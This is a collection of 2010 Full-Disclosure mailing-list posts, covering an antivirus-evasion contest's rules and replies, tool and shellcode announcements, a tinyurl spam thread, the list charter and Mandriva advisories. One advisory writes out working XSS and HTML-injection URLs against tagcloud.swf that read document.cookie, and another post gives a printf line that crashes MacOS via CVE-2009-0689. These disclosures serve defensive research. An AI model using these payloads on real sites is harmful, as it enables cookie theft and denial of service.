[Full-disclosure] iAWACS 2010 : Rules of the PWN2KILL contest
iAWACS 2010 : Rules of the PWN2KILL contest * http://www.esiea-recherche.eu/iawacs2010/ The PWN2KILL Contest aims at performing a comparative evaluation of commercial antivirus software against actual threats. An actual threat can be defined as any threat that is operationnally viable. The purpose is to show that given fixed actual malware threats, the different existing antivirus software are of inequal quality. While a few of them are able to proactively detect unknown malware using known malware techniques, most of them are just able to detect most of the known malware (not all of them). Moreover, the in-depth analysis of existing antivirus software shows that a significant number of malware technique that have been published -- by hackers, malware writers, researchers in computer security and computer virology -- are still not taken into account by commercial antivirus products while those techniques indeed represent actual threats. Consequently, it is more than useful for the end user and the final consumer (since AV software are products that we buy) to know which antivirus at the less worst and which are the worst. The contest board will be composed of a bailiff, of five professional journalists from the computer technical press and of three personalities from the scientific/hacking community renowned for their personal ethics and skills. His role will be to record the test results, decide of their validity and elect the three most efficient attacks. The contest will be based on the only admissible approach: the experiment and the attacker's view. The rules are very simple: 1.- A number of computers -- each of them with an antivirus installed -- will be available. The environment will be - Windows 7 (in a virtual machine for an easy reconfiguration purpose). - User mode (without privilege). - No connection to the Internet (to avoid ``external'' attacks or manipulation during the contest). However to enable truly network-based attacks (input and/or output data), it will be possible upon request to open temporarily an access to the Internet provided that no attack will be launched from the testing machine towards external systems. - Common applications installed (Microsoft suite, OpenOffice Suite, Pdf reader...). Any additional application can be added upon request or can be used through personal USB devices. - A printer will be available through the network (spec data available upon request). 2.- Each participant will come with his (malware) code(s) to test against the antivirus software. He can perform any action that a normal user can do (including rebooting the computer, closing a session, using USB devices...). In case of ``proactive'' warning from the operating system or from any application, the user is free to follow them or not. Any user has not to be an expert in computers in order to evaluate and interpret technical warnings that sometimes refers to normal behaviours. As an example, warnings like ``an application is attempting to become resident. Do you allow it?'' has no meaning for a grandmother using a computer. She is free to allow it! 3.- In order to make a comparative and fair testing, any code must be tested against ALL antivirus selected for the challenge. The test will consist in two step~: first the code(s) will be scanned (on demand analysis) then used as intended (on-access analysis). 4.- Any participant will have first to announce what effect/attack he intends to perform. The board will decide whether this attack is admissible or not. An admissible attack is an attack which affect availability, integrity and/or confidentiality of the system and/or the data (data system, user data...). 5.- Any participant will have to write a short technical summary of his attack(s) which will be published on the iAWACS website. He will have to present his attack(s) during the contest debriefing. A copy of its code will be given to the organizers of the challenge. For fairness purposes, no participants working for any AV company or any company sharing common interest with AV companies, will be allowed to participate. Any participant will thus have to sign an assessment form confirming he is not working for such companies. The organizers of iAWACS 2010 and of the PWN2KILL challenge have selected the following antivirus software: -- Avast -- AVG -- Avira -- BitDefender -- DrWeb -- FSecure -- GData -- Kasperky -- McAfee -- Microsoft AV -- NOD 32 -- Norton Symantec -- Trend Micro Only commercial licences will be tested -- in other words they will be anonymously bought in public stores/website (no demo or free version). The antivirus will be updated right before the
[Full-disclosure] Download and LoadLibrary shellcode released
For those interested in shellcode: download and LoadLibrary shellcode has some benefits over download execute shellcode. Read more about it here: http://skypher.com/index.php/2010/01/11/download-and-loadlibrary-shellcode-released/ Cheers, SkyLined Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re [2]: iiscan results - a closer look
Good day all, Give a few keys from me: 37e65b9f6a61bc3f e2dcfc0b249e4a73 de744886da78d1ac 32bd48ed74ef30e5 858c1d2b83b2ec06 On Fri, 8 Jan 2010 16:42:33 -0400, d...@sucuri.net wrote: I played with it a little yesterday and posted my thoughts (as well as a summary of their whole scan) at: http://blog.sucuri.net/2010/01/closer-look-at-iiscan.html It is a nice tool with some good checks looking for SQL, XSS, etc... I just think they didn't look deep enough in my site to check more stuff... --dd On Thu, Jan 7, 2010 at 11:58 AM, Robin Sage robin.s...@rocketmail.com wrote: If anyone has any more invite codes please send one to me. I tried the ones posted and they were not functional. I also emailed support and never received a response. Has anyone compared this to AppScan, WebInspect, Sentinnel, Qualys or Acunetix ? How many trials do you get per invite code? Just 1 app? Thanks! From: Jardel Weyrich jweyr...@gmail.com To: p8x l...@p8x.net Cc: full-disclosure@lists.grok.org.uk Sent: Thu, January 7, 2010 9:33:07 AM Subject: Re: [Full-disclosure] iiscan results It's probably trying to get different results/responses by changing the values of some request headers. The most common scenario, as far as I've seen, and as oddly as it might sound, is the User-Agent and HTTP minor version. A more verbose logging strategy would demystify. Or maybe Vincent? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - Best regards! Vladimir Vorontsov, security expert. ONsec: turn on security ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iAWACS 2010 : Rules of the PWN2KILL contest
Hi, I see a lot of 'what the participants have to do' and 'what the participants have to give away', but I don't see anywhere what the winner/s of the contest would win in all this. Where can I find that information? in order to decide if it is worth participating or not. Thanks in advance. Cheers, sergio On Jan 11, 2010, at 11:05 AM, Anthony Desnos wrote: iAWACS 2010 : Rules of the PWN2KILL contest * http://www.esiea-recherche.eu/iawacs2010/ The PWN2KILL Contest aims at performing a comparative evaluation of commercial antivirus software against actual threats. An actual threat can be defined as any threat that is operationnally viable. The purpose is to show that given fixed actual malware threats, the different existing antivirus software are of inequal quality. While a few of them are able to proactively detect unknown malware using known malware techniques, most of them are just able to detect most of the known malware (not all of them). Moreover, the in-depth analysis of existing antivirus software shows that a significant number of malware technique that have been published -- by hackers, malware writers, researchers in computer security and computer virology -- are still not taken into account by commercial antivirus products while those techniques indeed represent actual threats. Consequently, it is more than useful for the end user and the final consumer (since AV software are products that we buy) to know which antivirus at the less worst and which are the worst. The contest board will be composed of a bailiff, of five professional journalists from the computer technical press and of three personalities from the scientific/hacking community renowned for their personal ethics and skills. His role will be to record the test results, decide of their validity and elect the three most efficient attacks. The contest will be based on the only admissible approach: the experiment and the attacker's view. The rules are very simple: 1.- A number of computers -- each of them with an antivirus installed -- will be available. The environment will be - Windows 7 (in a virtual machine for an easy reconfiguration purpose). - User mode (without privilege). - No connection to the Internet (to avoid ``external'' attacks or manipulation during the contest). However to enable truly network-based attacks (input and/or output data), it will be possible upon request to open temporarily an access to the Internet provided that no attack will be launched from the testing machine towards external systems. - Common applications installed (Microsoft suite, OpenOffice Suite, Pdf reader...). Any additional application can be added upon request or can be used through personal USB devices. - A printer will be available through the network (spec data available upon request). 2.- Each participant will come with his (malware) code(s) to test against the antivirus software. He can perform any action that a normal user can do (including rebooting the computer, closing a session, using USB devices...). In case of ``proactive'' warning from the operating system or from any application, the user is free to follow them or not. Any user has not to be an expert in computers in order to evaluate and interpret technical warnings that sometimes refers to normal behaviours. As an example, warnings like ``an application is attempting to become resident. Do you allow it?'' has no meaning for a grandmother using a computer. She is free to allow it! 3.- In order to make a comparative and fair testing, any code must be tested against ALL antivirus selected for the challenge. The test will consist in two step~: first the code(s) will be scanned (on demand analysis) then used as intended (on-access analysis). 4.- Any participant will have first to announce what effect/attack he intends to perform. The board will decide whether this attack is admissible or not. An admissible attack is an attack which affect availability, integrity and/or confidentiality of the system and/or the data (data system, user data...). 5.- Any participant will have to write a short technical summary of his attack(s) which will be published on the iAWACS website. He will have to present his attack(s) during the contest debriefing. A copy of its code will be given to the organizers of the challenge. For fairness purposes, no participants working for any AV company or any company sharing common interest with AV companies, will be allowed to participate. Any participant will thus have to sign an assessment form confirming he is not working for such
Re: [Full-disclosure] iAWACS 2010 : Rules of the PWN2KILL contest
Hi Anthony, AD The PWN2KILL Contest aims at performing a comparative evaluation of AD commercial AD antivirus software against actual threats. AD An actual threat can be defined as any threat that is operationnally AD viable. The challenge is rather large and the goals not really clear, based of above, pwn includes dropping custom malware and checking whether itisdetected. Installing a rootkit is counted as pwned? You do not include the hardware details of the machine for instance if there are cpu vitalization features supported? Apparently proactive detection rules can simply be ignored based on the assumption a grandma will click yes anyways.(below) I am not sure thought a grandma really provides the incentive to create custom code in real life ;) Will this really will prove anything, from my experience all an every anti-virus software can be pwned (as per your definition) with custom unknown code. What is left are the Windows7 ACLs which you need to bypass also, these can be more of a problem then bypassing AV. I am with Sergio, what is there to gain for somebody that spends x weeks on targets ? Apart from having their name displayed on your website, that might not be enough for anybody ;) Regards, Thierry AD As an ADexample, warnings like ``an application is attempting to become AD resident. ADDo you allow it?'' has no meaning for a grandmother using a AD computer. ADShe is free to allow it! AD2.- Each participant will come with his (malware) code(s) to test AD against ADthe antivirus software. He can perform any action that a normal AD user can ADdo (including rebooting the computer, closing a session, using USB ADdevices...). In case of ``proactive'' warning from the operating AD system ADor from any application, the user is free to follow them or not. AD Any user ADhas not to be an expert in computers in order to evaluate and AD interpret ADtechnical warnings that sometimes refers to normal behaviours. As an ADexample, warnings like ``an application is attempting to become AD resident. ADDo you allow it?'' has no meaning for a grandmother using a AD computer. ADShe is free to allow it! AD3.- In order to make a comparative and fair testing, any code must be AD tested ADagainst ALL antivirus selected for the challenge. The test will AD consist ADin two step~: first the code(s) will be scanned (on demand analysis) ADthen used as intended (on-access analysis). AD4.- Any participant will have first to announce what effect/attack he AD intends ADto perform. The board will decide whether this attack is AD admissible or ADnot. An admissible attack is an attack which affect availability, ADintegrity and/or confidentiality of the system and/or the data (data ADsystem, user data...). AD5.- Any participant will have to write a short technical summary of his ADattack(s) which will be published on the iAWACS website. He will AD have to ADpresent his attack(s) during the contest debriefing. A copy of AD its code ADwill be given to the organizers of the challenge. AD For fairness purposes, no participants working for any AV company or any AD company sharing common interest with AV companies, will be allowed to AD participate. Any participant will thus have to sign an assessment form AD confirming he is not working for such companies. AD AD The organizers of iAWACS 2010 and of the PWN2KILL challenge have AD selected the AD following antivirus software: AD-- Avast AD-- AVG AD-- Avira AD-- BitDefender AD-- DrWeb AD-- FSecure AD-- GData AD-- Kasperky AD-- McAfee AD-- Microsoft AV AD-- NOD 32 AD-- Norton Symantec AD-- Trend Micro AD AD Only commercial licences will be tested -- in other words they will be AD anonymously bought in public stores/website (no demo or free version). AD The antivirus will be updated right before the beginning of the challenge. AD The organizers will publish a technical summary of the results once AD validated AD by the contest board. No communication will be done directly towards the AV AD vendors. Only a technical communication and press conference will be AD organized AD during the iAWACS event. A technical summary will be available on the AD iAWACS AD website. The complete data and codes collected will be communicated only AD to the AD French CERT-A for analysis and feedbacks. No code will be neither AD published nor AD distributed. AD Any participant is free to communicate later on about his test/code/attack AD performed during the contest. In this case, iAWACS organizers are not AD responsible for that communication. AD ___ AD Full-Disclosure - We believe in it. AD Charter: http://lists.grok.org.uk/full-disclosure-charter.html AD Hosted and sponsored by
[Full-disclosure] a:Schwachstelle: Durzosploit v0.1 alpha
:end Hi all readers, Just releasing a very small tool I wrote called Durzosploit. Durzosploit is a javascript exploits generator framework that works through the console. This goal of that project is to quickly and easily generate working exploits for cross-site scripting vulnerabilities in popular web applications or web sites. Please note that Durzosploit does not find browser vulnerabilities, it only is an framework containing exploits you can use. More info can be found here: http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction You can get it through the SVN: http://engineeringforfun.com/wiki/index.php/Durzosploit_SVN :end ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Surge in Skype Spam activity
Surge in Skype Spam activity. http://tinyurl.com/yc38trm http://tinyurl.com/yc38trm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Surge in Skype Spam activity
h, shall I click a tinyurl coming from a f-d poster? n/n, pick one this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it. 2010/1/11 Chen Levkovich chen.levkov...@securityextension.com Surge in Skype Spam activity. http://tinyurl.com/yc38trm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Surge in Skype Spam activity
It’s harmless, he’s just blowing his own company’s horn. Speaking of spam… h, shall I click a tinyurl coming from a f-d poster? n/n, pick one this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it. 2010/1/11 Chen Levkovich chen.levkov...@securityextension.com Surge in Skype Spam activity. http://tinyurl.com/yc38trm http://tinyurl.com/yc38trm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Surge in Skype Spam activity
Hah, I see what you did there. Sent from my iPhone On 11 Jan 2010, at 13:43, Larry Seltzer la...@larryseltzer.com wrote: It’s harmless, he’s just blowing his own company’s horn. Speaking of spam… h, shall I click a tinyurl coming from a f-d poster? n/n, pick one this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it. 2010/1/11 Chen Levkovich chen.levkov...@securityextension.com Surge in Skype Spam activity. http://tinyurl.com/yc38trm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Surge in Skype Spam activity
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I did but I use Firefox + NoScript in a vm for such things. Admittedly still risky especially if the site pedals a certain kind of porn and is on a watch list. I know I should really chain proxy or TOR to such links. Unfortunately this occurred to me after clicking the link. There is not much to see here, it's a new site with next to no content. There are couple of examples of the typical kind of spam one gets via email:Viagra and cheap software. It has a blog format. I believe the guy/gal is just promoting his/her site. There is script on the page: jQuery 1.2.6 - New Wave Javascript drupal.js,v 1.41.2.4 2009/07/21 as well as google analytics stuff. To my admittedly limited knowledge the site is benign mrx dramacrat wrote: h, shall I click a tinyurl coming from a f-d poster? n/n, pick one this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it. 2010/1/11 Chen Levkovich chen.levkov...@securityextension.com Surge in Skype Spam activity. http://tinyurl.com/yc38trm - -- Mankind's systems are white sticks tapping walls. Thanks Roy http://www.propergander.org.uk -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBS0svELIvn8UFHWSmAQLK7wf/RFF4dLAO/MCVKtFIDxNFCNbSMdjzGfKM QsaIo5Dk3TboYL/V7LU0kZU7HbclFRb2lcfo6+mGws4c4HjoxYhWFRnCq0IQi2bY lbL0D5OAOwplo3R79B9dgsxaI1BwdkjljzmHuORLQW9g4bMq+uXUtJvCNOGeZy2y LVTZDGST3O6Myr2Yqy3kxAagq01hO31p/H+TRIzt7NVy1R+pZH8mYuQFW1nqub/P svlKIDs30NskwEOu0A0B6ezTp3/xry6Mqr4975rmfncHsO4seN2FYHIkiyi324k+ YNCHFE6qJEMj3WI91PIjp8jJPM+escZh/8EkRC5d9gYANlxIXveZsg== =uBiw -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Surge in Skype Spam activity
dramacrat wrote: h, shall I click a tinyurl coming from a f-d poster? n/n, pick one this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it. Whilst I agree entirely with these sentiments, at least tinyurl has a (I thought well-known) preview option that does not require a browser plugin -- simply prefix the tinyurl.com domain name with the preview sub-domain and instead of auto-redirecting you tinyurl will tell you the redirection URL. Also, is using a commandline URL grabber like curl or wget to see the 301 redirect terget really that difficult for a 1337 F-D hax0r such as yourself? FWIW, the target URL is: http://securityextension.com/securitylab which really doesn't seem worth the effort of shortening... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Surge in Skype Spam activity
On Monday 11 January 2010 14:32:06 dramacrat wrote: h, shall I click a tinyurl coming from a f-d poster? n/n, pick one this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it. 2010/1/11 Chen Levkovich chen.levkov...@securityextension.com Surge in Skype Spam activity. http://tinyurl.com/yc38trm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I am not a security expert, but I suppose that when you don't trust the sender the security countermeasures you have to take while opening a shortened url are *obviously* the same as opening a clean one. Stanza ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Surge in Skype Spam activity
Hello all, Every long journey begins with a small step…. As requested, with full URL Chen http://www.securityextension.com/securitylab From: Larry Seltzer [mailto:la...@larryseltzer.com] Sent: Monday, January 11, 2010 3:44 PM To: dramacrat; Chen Levkovich Cc: full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Surge in Skype Spam activity It’s harmless, he’s just blowing his own company’s horn. Speaking of spam… h, shall I click a tinyurl coming from a f-d poster? n/n, pick one this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it. 2010/1/11 Chen Levkovich chen.levkov...@securityextension.com Surge in Skype Spam activity. http://tinyurl.com/yc38trm http://tinyurl.com/yc38trm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
On Thu, Jan 7, 2010 at 7:20 PM, Maksymilian Arciemowicz c...@securityreason.com wrote: [ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes I tested doing printf %1.262159f 1.1 in a shell login on 10.4.11 and it took out my session. I imagine this means 10.4.11 is vulnerable as well no? Tiger is still very popular in enterprise environments that are slow to upgrade. -- Joshua Levitsky, MCSE, CISSP http://www.jnuxhosting.net http://www.jnux.net http://blog.joshie.com/ [5957 F27C 9C71 E9A7 274A 0447 C9B9 75A4 9B41 D4D1] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection
It's spelled synergy. --- Jef Jef Poskanzer j...@mail.acme.com http://acme.com/jef/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS vulnerabilities in 34 millions flash files
Hello Full-Disclosure! Yesterday I wrote the article XSS vulnerabilities in 34 millions flash files (http://websecurity.com.ua/3842/), and here is English version of it. In December in my article XSS vulnerabilities in 8 millions flash files (http://websecurity.com.ua/3789/) I wrote, that there are up to 3400 of flashes tagcloud.swf in Internet which are potentially vulnerable to XSS attacks. Taking into account that people mostly didn't draw attention in previous article to my mentioning about another 34 millions of vulnerable flashes, then I decided to write another article about it. File tagcloud.swf was developed by author of plugin WP-Cumulus for WordPress (http://websecurity.com.ua/3665/) and it's delivered with this plugin for WordPress, and also with other plugins, particularly Joomulus (http://websecurity.com.ua/3801/) and JVClouds3D (http://websecurity.com.ua/3839/) for Joomla and Blogumus (http://websecurity.com.ua/3843/) for Blogger. Taking into account prevalence of this flash file, I'll note that it's most widespread flash file in Internet with XSS vulnerability. - Prevalence of the problem. - There are a lot of vulnerable tagcloud.swf files in Internet (according to Google): http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf If at 18.12.2009 there were about 3400 results, then now there are about 3250 results. And these are only those flash files, which were indexed by Google, and actually there can be much more of them. So there are about 32,5 millions of sites with file tagcloud.swf which are vulnerable to XSS and HTML Injection attacks. Among them there are about 273000 gov-sites (http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf+inurl:govfilter=0) which are vulnerable to XSS and HTML Injection attacks. -- Vulnerabilities in swf-file. -- File tagcloud.swf is vulnerable to XSS and HTML Injection attacks via parameter tagcloud. XSS: http://site/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E Code will execute after click. It's strictly social XSS. HTML Injection: http://site/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTML Injection attack can be conducted particularly on those flash files which have protection (in flash files or via WAF) against javascript and vbscript URI in parameter tagcloud. Examples of vulnerable sites. I gave examples of vulnerable sites with this swf-file in post XSS vulnerabilities in tagcloud.swf at gov and gov.ua (http://websecurity.com.ua/3835/). So for flash developers it's better to attend to security of their flash files. And for owners of sites with vulnerable flashes (particularly tagcloud.swf) it's needed either to fix them by themselves, or to turn to their developers. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright jo...@grok.org.uk - Introduction Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclos...@lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iAWACS 2010 : Rules of the PWN2KILL contest
On Mon, 11 Jan 2010 12:45:33 +0100, Thierry Zoller said: Apparently proactive detection rules can simply be ignored based on the assumption a grandma will click yes anyways.(below) I am not sure thought a grandma really provides the incentive to create custom code in real life ;) Unfortunately, out in the real world, grannies cause botnets. And botnets make money. So botnet authors have plenty of incentive to create codes. Of course, that doesn't mean anybody will feel an incentive to create custom code for this contest... pgpV3FpukpfIZ.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Surge in Skype Spam activity
http://kiserai.net/turl.pl Tiny URL decoder. I was going to send the TinyURL decoder in a TinyURL, but I’m just not that motivated atm. ☺ t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Larry Seltzer Sent: Monday, January 11, 2010 5:44 AM To: dramacrat; Chen Levkovich Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Surge in Skype Spam activity It’s harmless, he’s just blowing his own company’s horn. Speaking of spam… h, shall I click a tinyurl coming from a f-d poster? n/n, pick one this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it. 2010/1/11 Chen Levkovich chen.levkov...@securityextension.commailto:chen.levkov...@securityextension.com Surge in Skype Spam activity. http://tinyurl.com/yc38trm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:293-1 ] squidGuard
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:293-1 http://www.mandriva.com/security/ ___ Package : squidGuard Date: January 11, 2010 Affected: 2008.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in squidGuard: Buffer overflow in sgLog.c in squidGuard 1.3 and 1.4 allows remote attackers to cause a denial of service (application hang or loss of blocking functionality) via a long URL with many / (slash) characters, related to emergency mode. (CVE-2009-3700). Multiple buffer overflows in squidGuard 1.4 allow remote attackers to bypass intended URL blocking via a long URL, related to (1) the relationship between a certain buffer size in squidGuard and a certain buffer size in Squid and (2) a redirect URL that contains information about the originally requested URL (CVE-2009-3826). squidGuard was upgraded to 1.2.1 for MNF2/CS3/CS4 with additional upstream security and bug fixes patches applied. This update fixes these vulnerabilities. Update: Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3700 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3826 ___ Updated Packages: Mandriva Linux 2008.0: a26b9b6c562df50e5bdc2085d64afee0 2008.0/i586/squidGuard-1.2.0-14.1mdv2008.0.i586.rpm 2bc79ed1f73af0b5cb7c82b7f2df78f7 2008.0/SRPMS/squidGuard-1.2.0-14.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: ee84967352ebe00624076d19e17ee1a3 2008.0/x86_64/squidGuard-1.2.0-14.1mdv2008.0.x86_64.rpm 2bc79ed1f73af0b5cb7c82b7f2df78f7 2008.0/SRPMS/squidGuard-1.2.0-14.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLS0OamqjQ0CJFipgRAgP3AJ9py/Tg9qjl/U0Yuh10yZDXf1xwOACg9KWD Tw4fLufXqTNLIDg4DVmUyyw= =lwUV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:227-1 ] freeradius
